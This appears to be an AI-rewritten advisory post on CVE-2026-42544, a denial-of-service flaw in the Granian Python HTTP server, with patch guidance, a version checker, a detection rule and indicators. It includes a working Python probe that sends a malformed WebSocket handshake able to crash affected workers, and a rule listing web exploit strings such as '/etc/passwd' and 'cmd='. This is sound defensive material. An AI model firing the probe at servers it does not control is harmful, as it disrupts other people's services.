Granian HTTP Server Vulnerability: Unauthenticated DoS via WebSocket Protocol Header
The National Vulnerability Database has disclosed CVE-2026-42544, a high-severity vulnerability (CVSS: 7.5) affecting Granian, a Rust-based HTTP server for Python applications. Versions 1.2.0 through 2.7.3 are susceptible to a denial-of-service (DoS) attack. An unauthenticated client can trigger a worker process crash by sending a WebSocket upgrade request containing non-ASCII bytes in the Sec-WebSocket-Protocol header.
This isn't a theoretical bug. The crash happens in Granian's WebSocket scope construction path, before the request ever reaches the ASGI application, so no authentication check, session lookup or application-level input validation stands in the way: a single malformed header takes down a worker process. Because the fault lives in the server itself, middleware inside the application cannot intercept the request; mitigation has to happen in the server (patching) or in whatever sits in front of it. The impact is on availability alone; the advisory describes no code execution or data exposure, which is consistent with the high (not critical) 7.5 rating.
The vulnerability is addressed in Granian version 2.7.4. Defenders running affected versions need to prioritize this patch. The attacker’s calculus here is low effort, high reward: a single unauthenticated request can cause significant operational impact, making it an attractive target for even unsophisticated actors.
What This Means For You
- If your organization utilizes Granian as an HTTP server for Python applications, immediately verify your version. If it's between 1.2.0 and 2.7.3, you are exposed to an unauthenticated denial-of-service. Patch to version 2.7.4 or later without delay to prevent service disruption from a simple, malformed WebSocket request.
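The two checks above, as an added example (not code from the Granian project or the original advisory): a version test against the affected range the advisory gives, and a builder for the raw HTTP/1.1 WebSocket handshake the advisory describes, with non-ASCII bytes in `Sec-WebSocket-Protocol`. The request is assembled as raw bytes because ordinary HTTP client libraries reject or re-encode non-ASCII header values. The default protocol value (`chat` followed by UTF-8 `é`) and the helper names are my own; point `send_probe()` only at a staging instance you own, since an affected worker will crash.

```python
"""Added example: version check and handshake builder for CVE-2026-42544.

Not the Granian project's code. Ranges come from the advisory:
affected 1.2.0 through 2.7.3, fixed in 2.7.4.
"""
import base64
import os
import socket
from typing import Optional, Tuple

AFFECTED_MIN = (1, 2, 0)  # first affected version, per the advisory
FIXED = (2, 7, 4)         # first fixed version, per the advisory


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn '2.7.3' (or '2.7.3.dev1', '2.0.0rc1') into a comparable 3-tuple
    of the leading numeric components; non-numeric suffixes are ignored."""
    parts = []
    for piece in text.strip().split("."):
        digits = ""
        for ch in piece:
            if ch.isdigit():
                digits += ch
            else:
                break
        if not digits:
            break
        parts.append(int(digits))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])  # type: ignore[return-value]


def is_affected(version: str) -> bool:
    """True when the version falls inside the advisory's affected range."""
    return AFFECTED_MIN <= parse_version(version) < FIXED


def installed_granian_version() -> Optional[str]:
    """Version of the granian distribution in this environment, or None if absent."""
    from importlib.metadata import PackageNotFoundError, version
    try:
        return version("granian")
    except PackageNotFoundError:
        return None


def build_upgrade_request(host: str, path: str = "/",
                          protocol: bytes = b"chat\xc3\xa9") -> bytes:
    """Raw RFC 6455 client handshake whose Sec-WebSocket-Protocol value carries
    non-ASCII bytes (the trigger described in the advisory). Everything else is
    an ordinary upgrade request. The default protocol value is a constructed sample."""
    key = base64.b64encode(os.urandom(16))  # random nonce, as a real client would send
    lines = [
        b"GET " + path.encode("ascii") + b" HTTP/1.1",
        b"Host: " + host.encode("ascii"),
        b"Upgrade: websocket",
        b"Connection: Upgrade",
        b"Sec-WebSocket-Version: 13",
        b"Sec-WebSocket-Key: " + key,
        b"Sec-WebSocket-Protocol: " + protocol,
    ]
    return b"\r\n".join(lines) + b"\r\n\r\n"


def send_probe(host: str, port: int, path: str = "/", timeout: float = 5.0) -> bytes:
    """Send the handshake to a test instance and return the raw reply.
    An empty reply (reset or timeout) is what a crashed worker looks like."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_upgrade_request(host, path))
        try:
            return sock.recv(4096)
        except (socket.timeout, ConnectionResetError):
            return b""


if __name__ == "__main__":
    found = installed_granian_version()
    if found is None:
        print("granian is not installed in this environment")
    else:
        state = "AFFECTED, upgrade to 2.7.4+" if is_affected(found) else "not in affected range"
        print(f"granian {found}: {state}")
```

Run the module as-is to check the local install; call `send_probe("staging.example", 8000)` by hand against a disposable instance. A healthy, patched server answers with either `101 Switching Protocols` or a `4xx` rejecting the header; no reply at all means the worker went away.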
Detection Rules
Web Application Exploitation Attempt — CVE-2026-42544
```yaml
title: Web Application Exploitation Attempt — CVE-2026-42544
id: scw-2026-05-12-1
status: experimental
level: high
description: |
  Detects common web exploitation strings in request query strings. This rule is
  generic: it does not match the CVE-2026-42544 trigger itself (non-ASCII bytes in
  the Sec-WebSocket-Protocol header of a WebSocket upgrade request), which most
  webserver access logs do not record. Review the CVE-2026-42544 advisory for
  specific indicators.
author: SCW Feed Engine (auto-generated)
date: 2026-05-12
references:
  - https://shimiscyberworld.com/posts/nvd-CVE-2026-42544/
tags:
  - attack.initial_access
  - attack.t1190
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query|contains:
      - '..'
      - 'SELECT'
      - 'UNION'
      - '<script'
      - 'cmd='
      - '/etc/passwd'
  condition: selection
falsepositives:
  - Vulnerability scanners and legitimate requests whose query string happens to contain these strings
```
Source: Shimi's Cyber World
Indicators of Compromise
| ID | Type | Indicator |
|---|---|---|
| CVE-2026-42544 | Affected versions | Granian HTTP server 1.2.0 through 2.7.3 (fixed in 2.7.4) |
| CVE-2026-42544 | Trigger | Unauthenticated WebSocket upgrade request with non-ASCII bytes in the Sec-WebSocket-Protocol header |
| CVE-2026-42544 | Crash location | Granian's WebSocket scope construction path, before the ASGI application is invoked |
Source & Attribution
| Field | Value |
|---|---|
| Source Platform | NVD |
| Channel | National Vulnerability Database |
| Published | May 13, 2026 at 01:16 UTC |
This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.